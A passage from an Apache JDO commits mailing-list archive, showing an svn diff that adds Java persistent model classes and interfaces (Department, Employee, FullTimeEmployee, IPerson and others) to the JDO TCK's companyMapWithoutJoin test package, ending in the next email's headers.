getDepartment(String name) { + return (Department)getBean(name, Department.class); + } + + /** + * Convenience method returning an Employee instance for the specified + * name. The method returns <code>null</code> if there is no Employee + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Employee bean. + */ + public Employee getEmployee(String name) { + return (Employee)getBean(name, Employee.class); + } + + /** + * Convenience method returning a FullTimeEmployee instance for the + * specified name. The method returns <code>null</code> if there is no + * FullTimeEmployee bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * FullTimeEmployee bean. + */ + public FullTimeEmployee getFullTimeEmployee(String name) { + return (FullTimeEmployee)getBean(name, FullTimeEmployee.class); + } + + /** + * Convenience method returning a PartTimeEmployee instance for the + * specified name. The method returns <code>null</code> if there is no + * PartTimeEmployee bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * PartTimeEmployee bean. + */ + public PartTimeEmployee getPartTimeEmployee(String name) { + return (PartTimeEmployee)getBean(name, PartTimeEmployee.class); + } + + /** + * Convenience method returning a Person instance for the specified + * name. The method returns <code>null</code> if there is no Person + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Person bean. + */ + public Person getPerson(String name) { + return (Person)getBean(name, Person.class); + } + + /** + * @return Returns the tearDownClasses. + */ + public Class[] getTearDownClassesFromFactory() { + return companyFactory.getTearDownClasses(); + } + + /** + * @return Returns the tearDownClasses. + */ + public static Class[] getTearDownClasses() { + return CompanyFactoryConcreteClass.tearDownClasses; + } + + public static Date stringToUtilDate(String value) { + return ConversionHelper.toUtilDate(DATE_PATTERN, "America/New_York", Locale.US, value); + } +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,341 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.io.Serializable; +import java.io.ObjectInputStream; +import java.io.IOException; + +import java.util.Collections; +import java.util.Comparator; +import java.util.Map; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a department within a company. + */ +public class Department + implements IDepartment, Serializable, Comparable, Comparator, DeepEquality { + + public static final int RECOMMENDED_NO_OF_EMPS = 2; + + private long deptid; + private String name; + private Company company; + private Map roles; + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public Department() {} + + /** + * Construct a <code>Department</code> instance. + * @param deptid The department id. + * @param name The name of the department. + */ + public Department(long deptid, String name) { + this.deptid = deptid; + this.name = name; + } + + /** + * Construct a <code>Department</code> instance. + * @param deptid The department id. + * @param name The name of the department. + * @param company The company that the department is associated with. + */ + public Department(long deptid, String name, ICompany company) { + this.deptid = deptid; + this.name = name; + this.company = (Company)company; + } + + /** + * Construct a <code>Department</code> instance. + * @param deptid The department id. + * @param name The name of the department. + * @param company The company that the department is associated with. + * @param roles Map of employees and their roles + */ + public Department(long deptid, String name, Company company, + Map roles) { + this.deptid = deptid; + this.name = name; + this.company = (Company)company; + this.roles = roles; + } + + /** + * Set the id associated with this object. + * @param id the id. + */ + public void setDeptid(long id) { + if (this.deptid != 0) + throw new IllegalStateException("Id is already set."); + this.deptid = id; + } + + /** + * Get the department id. + * @return The department id. + */ + public long getDeptid() { + return deptid; + } + + /** + * Get the name of the department. + * @return The name of the department. + */ + public String getName() { + return name; + } + + /** + * Set the name of the department. + * @param name The name to set for the department. + */ + public void setName(String name) { + this.name = name; + } + + /** + * Get the company associated with the department. + * @return The company. + */ + public ICompany getCompany() { + return company; + } + + /** + * Set the company for the department. + * @param company The company to associate with the department. + */ + public void setCompany(ICompany company) { + this.company = (Company)company; + } + + /** + * Get the roles in the department as an unmodifiable set. + ******************* FIX?? + * @return The set of employees in the department, as an unmodifiable + * set. + */ + public Map getRoles() { + return roles; + } + + /** + * Add an role to the department. + * @param emp The role to add to the department. + */ + public void addRole(String role, Employee emp) { + roles.put(role, emp); + } + + /** + * Remove an role from the department. + * @param emp The role to remove from the department. + */ + public void removeRole(String key) { + roles.remove(key); + } + + /** + * Set the roles to be in this department. + * @param roles The roles for this department. + */ + public void setRoles(Map roles) { + this.roles = roles; + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the other Department. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IDepartment otherDept = (IDepartment)other; + String where = "Department<" + deptid + ">"; + return + helper.equals(deptid, otherDept.getDeptid(), where + ".deptid") & + helper.equals(name, otherDept.getName(), where + ".name") & + helper.deepEquals(roles, otherDept.getRoles(), where + ".roles") & + helper.deepEquals(company, otherDept.getCompany(), where + ".company") ; + } + + /** + * Returns a String representation of a <code>Department</code> object. + * @return a String representation of a <code>Department</code> object. + */ + public String toString() { + return "Department(" + getFieldRepr()+ ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(deptid); + rc.append(", name ").append(name); + return rc.toString(); + } + + /** + * Compares this object with the specified object for order. Returns a + * negative integer, zero, or a positive integer as this object is less + * than, equal to, or greater than the specified object. + * @param o The Object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified object. + * @throws ClassCastException - if the specified object's type prevents + * it from being compared to this Object. + */ + public int compareTo(Object o) { + return compareTo((IDepartment)o); + } + + /** + * Compare two instances. This is a method in Comparator. + */ + public int compare(Object o1, Object o2) { + return compare((IDepartment)o1, (IDepartment)o2); + } + + /** + * Compares this object with the specified Department object for + * order. Returns a negative integer, zero, or a positive integer as + * this object is less than, equal to, or greater than the specified + * object. + * @param other The Department object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified + * Department object. + */ + public int compareTo(IDepartment other) { + return compare(this, other); + } + + /** + * Compares its two IDepartment arguments for order. Returns a negative + * integer, zero, or a positive integer as the first argument is less + * than, equal to, or greater than the second. + * @param o1 the first IDepartment object to be compared. + * @param o2 the second IDepartment object to be compared. + * @return a negative integer, zero, or a positive integer as the first + * object is less than, equal to, or greater than the second object. + */ + public static int compare(IDepartment o1, IDepartment o2) { + return EqualityHelper.compare(o1.getDeptid(), o2.getDeptid()); + } + + /** + * Indicates whether some other object is "equal to" this one. + * @param obj the object with which to compare. + * @return <code>true</code> if this object is the same as the obj + * argument; <code>false</code> otherwise. + */ + public boolean equals(Object obj) { + if (obj instanceof IDepartment) { + return compareTo((IDepartment)obj) == 0; + } + return false; + } + + /** + * Returns a hash code value for the object. + * @return a hash code value for this object. + */ + public int hashCode() { + return (int)deptid; + } + + /** + * The application identity class associated with the + * <code>Department</code> class. + */ + public static class Oid implements Serializable, Comparable { + + /** + * This field represents the application identifier field + * for the <code>Department</code> class. + * It must match in name and type with the field in the + * <code>Department</code> class. + */ + public long deptid; + + /** + * The required public, no-arg constructor. + */ + public Oid() { } + + /** + * A constructor to initialize the identifier field. + * @param deptid the deptid of the Department. + */ + public Oid(long deptid) { + this.deptid = deptid; + } + + public Oid(String s) { deptid = Long.parseLong(justTheId(s)); } + + public String toString() { return this.getClass().getName() + ": " + deptid;} + + + /** */ + public boolean equals(java.lang.Object obj) { + if( obj==null || !this.getClass().equals(obj.getClass()) ) + return( false ); + Oid o = (Oid) obj; + if( this.deptid != o.deptid ) return( false ); + return( true ); + } + + /** */ + public int hashCode() { + return( (int) deptid ); + } + + protected static String justTheId(String str) { + return str.substring(str.indexOf(':') + 1); + } + + /** */ + public int compareTo(Object obj) { + // may throw ClassCastException which the user must handle + Oid other = (Oid) obj; + if( deptid < other.deptid ) return -1; + if( deptid > other.deptid ) return 1; + return 0; + } + + } + +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,338 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.io.ObjectInputStream; +import java.io.IOException; + +import java.util.Collections; +import java.util.Date; +import java.util.HashSet; +import java.util.Map; +import java.util.Set; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents an employee. + */ +public abstract class Employee extends Person implements IEmployee { + + private Date hiredate; + private double weeklyhours; + private Department department; + private Department fundingDept; + private String role; + private Employee manager; + private Employee mentor; + private Employee protege; + private Employee hradvisor; + private transient Set team = new HashSet(); // element-type is Employee + private transient Set hradvisees = new HashSet(); // element-type is Employee + + /** This is the JDO-required no-args constructor */ + protected Employee() {} + + /** + * Construct an <code>Employee</code> instance. + * @param personid The identifier for the person. + * @param firstname The first name of the employee. + * @param lastname The last name of the employee. + * @param middlename The middle name of the employee. + * @param birthdate The birth date of the employee. + * @param hiredate The date that the employee was hired. + */ + public Employee(long personid, String firstname, String lastname, + String middlename, Date birthdate, + Date hiredate, String role) { + super(personid, firstname, lastname, middlename, birthdate); + this.hiredate = hiredate; + this.role = role; + } + + /** + * Get the date that the employee was hired. + * @return The date the employee was hired. + */ + public Date getHiredate() { + return hiredate; + } + + /** + * Set the date that the employee was hired. + * @param hiredate The date the employee was hired. + */ + public void setHiredate(Date hiredate) { + this.hiredate = hiredate; + } + + /** + * Get the weekly hours of the employee. + * @return The number of hours per week that the employee works. + */ + public double getWeeklyhours() { + return weeklyhours; + } + + /** + * Set the number of hours per week that the employee works. + * @param weeklyhours The number of hours per week that the employee + * works. + */ + public void setWeeklyhours(double weeklyhours) { + this.weeklyhours = weeklyhours; + } + + /** + * Get the employee's department. + * @return The department associated with the employee. + */ + public IDepartment getDepartment() { + return department; + } + + /** + * Set the employee's department. + * @param department The department. + */ + public void setDepartment(IDepartment department) { + this.department = (Department)department; + } + + /** + * Get the employee's funding department. + * @return The funding department associated with the employee. + */ + public IDepartment getFundingDept() { + return fundingDept; + } + + /** + * Set the employee's funding department. + * @param department The funding department. + */ + public void setFundingDept(IDepartment department) { + this.fundingDept = (Department)department; + } + + /** + * Get the employee's manager. + * @return The employee's manager. + */ + public IEmployee getManager() { + return manager; + } + + /** + * Set the employee's manager. + * @param manager The employee's manager. + */ + public void setManager(IEmployee manager) { + this.manager = (Employee)manager; + } + + /** + * Get the employee's team. + * @return The set of <code>Employee</code>s on this employee's team, + * returned as an unmodifiable set. + */ + public Set getTeam() { + return Collections.unmodifiableSet(team); + } + + /** + * Add an <code>Employee</code> to this employee's team. + * This method sets both sides of the relationship, modifying + * this employees team to include parameter emp and modifying + * emp to set its manager attribute to this object. + * @param emp The <code>Employee</code> to add to the team. + */ + public void addToTeam(Employee emp) { + team.add(emp); + emp.manager = this; + } + + /** + * Remove an <code>Employee</code> from this employee's team. + * This method will also set the <code>emp</code> manager to null. + * @param emp The <code>Employee</code> to remove from the team. + */ + public void removeFromTeam(Employee emp) { + team.remove(emp); + emp.manager = null; + } + + /** + * Set the employee's team. + * @param team The set of <code>Employee</code>s. + */ + public void setTeam(Set team) { + // workaround: create a new HashSet, because fostore does not + // support LinkedHashSet + this.team = (team != null) ? new HashSet(team) : null; + } + + /** + * Set the mentor for this employee. + * @param mentor The mentor for this employee. + */ + public void setMentor(IEmployee mentor) { + this.mentor = (Employee)mentor; + } + + /** + * Get the mentor for this employee. + * @return The mentor. + */ + public IEmployee getMentor() { + return mentor; + } + + /** + * Set the protege for this employee. + * @param protege The protege for this employee. + */ + public void setProtege(IEmployee protege) { + this.protege = (Employee)protege; + } + + /** + * Get the protege of this employee. + * @return The protege of this employee. + */ + public IEmployee getProtege() { + return protege; + } + + /** + * Set the HR advisor for this employee. + * @param hradvisor The hradvisor for this employee. + */ + public void setHradvisor(IEmployee hradvisor) { + this.hradvisor = (Employee)hradvisor; + } + + /** + * Get the HR advisor for the employee. + * @return The HR advisor. + */ + public IEmployee getHradvisor() { + return hradvisor; + } + + /** + * Get the HR advisees of this HR advisor. + * @return An unmodifiable <code>Set</code> containing the + * <code>Employee</code>s that are HR advisees of this employee. + */ + public Set getHradvisees() { + return Collections.unmodifiableSet(hradvisees); + } + + /** + * Add an <code>Employee</code> as an advisee of this HR advisor. + * This method also sets the <code>emp</code> hradvisor to reference + * this object. In other words, both sides of the relationship are + * set. + * @param emp The employee to add as an advisee. + */ + public void addAdvisee(Employee emp) { + hradvisees.add(emp); + emp.hradvisor = this; + } + + /** + * Remove an <code>Employee</code> as an advisee of this HR advisor. + * This method also sets the <code>emp</code> hradvisor to null. + * In other words, both sides of the relationship are set. + * @param emp The employee to add as an HR advisee. + */ + public void removeAdvisee(Employee emp) { + hradvisees.remove(emp); + emp.hradvisor = null; + } + + /** + * Set the HR advisees of this HR advisor. + * @param hradvisees The <code>Employee</code>s that are HR advisees of + * this employee. + */ + public void setHradvisees(Set hradvisees) { + // workaround: create a new HashSet, because fostore does not + // support LinkedHashSet + this.hradvisees = (hradvisees != null) ? new HashSet(hradvisees) : null; + } + + /** Serialization support: initialize transient fields. */ + private void readObject(ObjectInputStream in) + throws IOException, ClassNotFoundException { + in.defaultReadObject(); + team = new HashSet(); + hradvisees = new HashSet(); + } + + /** + * Return a String representation of a <code>Employee</code> object. + * @return a String representation of a <code>Employee</code> object. + */ + public String toString() { + return "Employee(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(super.getFieldRepr()); + rc.append(", hired ").append(formatter.format(hiredate)); + rc.append(", weeklyhours ").append(weeklyhours); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the corresponding fields of the specified Employee. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IEmployee otherEmp = (IEmployee)other; + String where = "Employee<" + getPersonid() + ">"; + return super.deepCompareFields(otherEmp, helper) & + helper.equals(hiredate, otherEmp.getHiredate(), where + ".hiredate") & + helper.closeEnough(weeklyhours, otherEmp.getWeeklyhours(), where + ".weeklyhours") & + helper.deepEquals(department, otherEmp.getDepartment(), where + ".department") & + helper.deepEquals(fundingDept, otherEmp.getFundingDept(), where + ".fundingDept") & + helper.deepEquals(manager, otherEmp.getManager(), where + ".manager") & + helper.deepEquals(mentor, otherEmp.getMentor(), where + ".mentor") & + helper.deepEquals(protege, otherEmp.getProtege(), where + ".protege") & + helper.deepEquals(hradvisor, otherEmp.getHradvisor(), where + ".hradvisor") & + helper.deepEquals(team, otherEmp.getTeam(), where + ".team") & + helper.deepEquals(hradvisees, otherEmp.getHradvisees(), where + ".hradvisees"); + } + +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,108 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a full-time employee. + */ +public class FullTimeEmployee extends Employee implements IFullTimeEmployee { + + private double salary; + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public FullTimeEmployee() {} + + /** + * Construct a full-time employee. + * @param personid The person identifier. + * @param first The person's first name. + * @param last The person's last name. + * @param middle The person's middle name. + * @param born The person's birthdate. + * @param hired The date that the person was hired. + * @param sal The salary of the full-time employee. + */ + public FullTimeEmployee(long personid, String first, String last, + String middle, Date born, + Date hired, String role, double sal) { + super(personid, first, last, middle, born, hired, role); + salary = sal; + } + + /** + * Get the salary of the full time employee. + * @return The salary of the full time employee. + */ + public double getSalary() { + return salary; + } + + /** + * Set the salary for the full-time employee. + * @param salary The salary to set for the full-time employee. + */ + public void setSalary(double salary) { + this.salary = salary; + } + + /** + * Return a String representation of a <code>FullTimeEmployee</code> object. + * @return a String representation of a <code>FullTimeEmployee</code> object. + */ + public String toString() { + return "FullTimeEmployee(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + public String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(super.getFieldRepr()); + rc.append(", $").append(salary); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified + * FullTimeEmployee. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IFullTimeEmployee otherEmp = (IFullTimeEmployee)other; + String where = "FullTimeEmployee<" + getPersonid() + ">"; + return super.deepCompareFields(otherEmp, helper) & + helper.closeEnough(salary, otherEmp.getSalary(), where + ".salary"); + } + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,38 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.util.Date; +import java.util.Set; + +/** + * This interface represents the persistent state of Company. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface ICompany { + + long getCompanyid(); + Set getDepartments(); + Date getFounded(); + String getName(); + + void setCompanyid(long id); + void setDepartments(Set depts); + void setFounded(Date date); + void setName(String string); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,37 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.util.Map; + +/** + * This interface represents the persistent state of Department. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IDepartment { + + long getDeptid(); + String getName(); + ICompany getCompany(); + Map getRoles(); + + void setDeptid(long deptid); + void setName(String name); + void setCompany(ICompany company); + void setRoles(Map roles); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,51 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.util.Date; +import java.util.Set; + +/** + * This interface represents the persistent state of Employee. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IEmployee extends IPerson { + + Date getHiredate(); + double getWeeklyhours(); + IDepartment getDepartment(); + IDepartment getFundingDept(); + IEmployee getManager(); + Set getTeam(); + IEmployee getMentor(); + IEmployee getProtege(); + IEmployee getHradvisor(); + Set getHradvisees(); + + void setHiredate(Date hiredate); + void setWeeklyhours(double weeklyhours); + void setDepartment(IDepartment department); + void setFundingDept(IDepartment department); + void setManager(IEmployee manager); + void setTeam(Set team); + void setMentor(IEmployee mentor); + void setProtege(IEmployee protege); + void setHradvisor(IEmployee hradvisor); + void setHradvisees(Set hradvisees); + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,28 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +/** + * This interface represents the persistent state of FullTimeEmployee. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IFullTimeEmployee extends IEmployee { + + double getSalary(); + void setSalary(double salary); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,28 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +/** + * This interface represents the persistent state of PartTimeEmployee. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IPartTimeEmployee extends IEmployee { + + double getWage(); + void setWage(double wage); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,41 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.util.Date; +import java.util.Map; + +/** + * This interface represents the persistent state of Person. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IPerson { + + long getPersonid(); + String getLastname(); + String getFirstname(); + String getMiddlename(); + Date getBirthdate(); + + void setPersonid(long personid); + void setLastname(String lastname); + void setFirstname(String firstname); + void setMiddlename(String middlename); + void setBirthdate(Date birthdate); + +} From [email protected] Fri Sep 08 21:50:45 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15188 invoked from network); 8 Sep 2006 21:50:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 21:50:39 -0000 Received: (qmail 40525 invoked by uid 500); 8 Sep 2006 21:50:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40514 invoked by uid 99); 8 Sep 2006 21:50:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 14:50:39 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 